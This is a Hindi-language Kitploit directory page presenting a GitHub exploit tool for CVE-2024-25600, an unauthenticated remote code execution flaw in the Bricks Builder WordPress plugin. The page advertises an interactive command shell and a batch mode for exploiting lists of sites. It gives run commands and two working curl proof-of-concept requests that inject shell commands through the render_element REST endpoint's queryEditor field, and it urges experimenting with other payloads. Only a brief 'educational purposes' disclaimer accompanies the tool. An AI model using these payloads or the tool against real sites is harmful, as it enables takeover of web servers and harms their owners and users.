Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-25600-Bricks-Builder-WordPress — CVE-2024-25600 के लिए स्वचालित एक्सप्लॉइट टूल, जो Bricks Builder प्लगइन का उपयोग करके WordPress साइटों पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन सक्षम करता है। कमांड निष्पादन के लिए इंटरैक्टिव और बैच मोड का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/kasoomi0228/cve-2024-25600-bricks-builder-wordpress
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubkasoomi0228/cve-2024-25600-bricks-builder-wordpress

CVE-2024-25600-Bricks-Builder-WordPress

CVE-2024-25600 के लिए स्वचालित एक्सप्लॉइट टूल, जो Bricks Builder प्लगइन का उपयोग करके WordPress साइटों पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन सक्षम करता है। कमांड निष्पादन के लिए इंटरैक्टिव और बैच मोड का समर्थन करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं
साझा करें

CVE-2024-25600 एक्सप्लॉइट टूल 🚀

विवरण 📝

यह टूल 🛠️ वर्डप्रेस के Bricks Builder प्लगइन में पाई गई CVE-2024-25600 भेद्यता 🕳️ का शोषण करने के लिए डिज़ाइन किया गया है। यह भेद्यता प्रभावित वेबसाइटों 💻 पर बिना प्रमाणीकरण के रिमोट कोड निष्पादन की अनुमति देती है। यह टूल nonce प्राप्त करके और मनमाने कमांड निष्पादित करने के लिए विशेष रूप से निर्मित अनुरोध भेजकर शोषण प्रक्रिया को स्वचालित करता है।

विशेषताएँ 🌟

  • इंटरैक्टिव मोड: लक्ष्य वेबसाइट के साथ वास्तविक समय में जुड़ें 🕹️।
  • बैच मोड: सूची से कई वेबसाइटों को स्कैन और शोषण करें 📋।
  • कमांड निष्पादन: लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करें ⚙️।

स्थापना 🛠️

  1. git clone का उपयोग करके इस रिपॉज़िटरी को अपनी स्थानीय मशीन 🖥️ पर क्लोन करें।
  2. क्लोन की गई रिपॉज़िटरी की निर्देशिका पर जाएँ।
  3. pip install -r requirements.txt का उपयोग करके आवश्यक Python लाइब्रेरी स्थापित करें।

उपयोग 📖

इंटरैक्टिव मोड 🎮

  1. इंटरैक्टिव मोड शुरू करने के लिए python exploit.py -u <URL> के साथ टूल चलाएँ।
  2. लक्ष्य सर्वर पर कमांड भेजने के लिए ऑन-स्क्रीन संकेतों का पालन करें।

बैच मोड 📊

  1. लक्ष्य URL की सूची के साथ एक टेक्स्ट फ़ाइल तैयार करें।
  2. सूचीबद्ध साइटों को स्कैन और शोषण करने के लिए python exploit.py -l <file_path> के साथ टूल चलाएँ।

प्रूफ ऑफ कॉन्सेप्ट (PoC) 📝

प्रकटीकरण द्वारा प्रदान किया गया मूल PoC इस प्रकार है:

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

अपडेट: दूसरा PoC (अधिक विश्वसनीय)

root@kitploit:~
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
  -H "Content-Type: application/json" \
  -d '{
  "postId": "1",
  "nonce": "[NONCE]",
  "element": {
    "name": "carousel",
    "settings": {
      "type": "posts",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "throw new Exception(`id`);",
        "objectType": "post"
      }
    }
  }
}'

यह संभव है कि अतिरिक्त पेलोड बेहतर परिणाम दे सकते हैं। यदि मेरा एक्सप्लॉइट या प्रूफ ऑफ कॉन्सेप्ट आपके लिए काम नहीं करता है, तो मैं आपको अधिक प्रभावी समाधान खोजने के लिए वैकल्पिक पेलोड के साथ प्रयोग करने के लिए प्रोत्साहित करता हूँ।

[HOST] को लक्ष्य वेबसाइट से और [NONCE] को साइट से प्राप्त nonce मान से बदलें।

संदर्भ 📖

CVE-2024-25600 भेद्यता के बारे में अधिक जानकारी के लिए, कृपया Snicco.io पर विस्तृत प्रकटीकरण देखें।

अस्वीकरण ⚠️

इस README में दी गई जानकारी केवल शैक्षिक उद्देश्यों के लिए है। अनधिकृत रूप से वेबसाइटों या नेटवर्कों में हैकिंग करना अवैध और अनैतिक है। 🚫

आभार 🙏

इस भेद्यता को खोजने और रिपोर्ट करने वाले सुरक्षा शोधकर्ताओं को धन्यवाद, जिन्होंने समुदाय को उनके वेब अनुप्रयोगों को सुरक्षित करने में मदद करने के लिए जानकारी और उपकरण प्रदान किए।

टूल डाउनलोड करें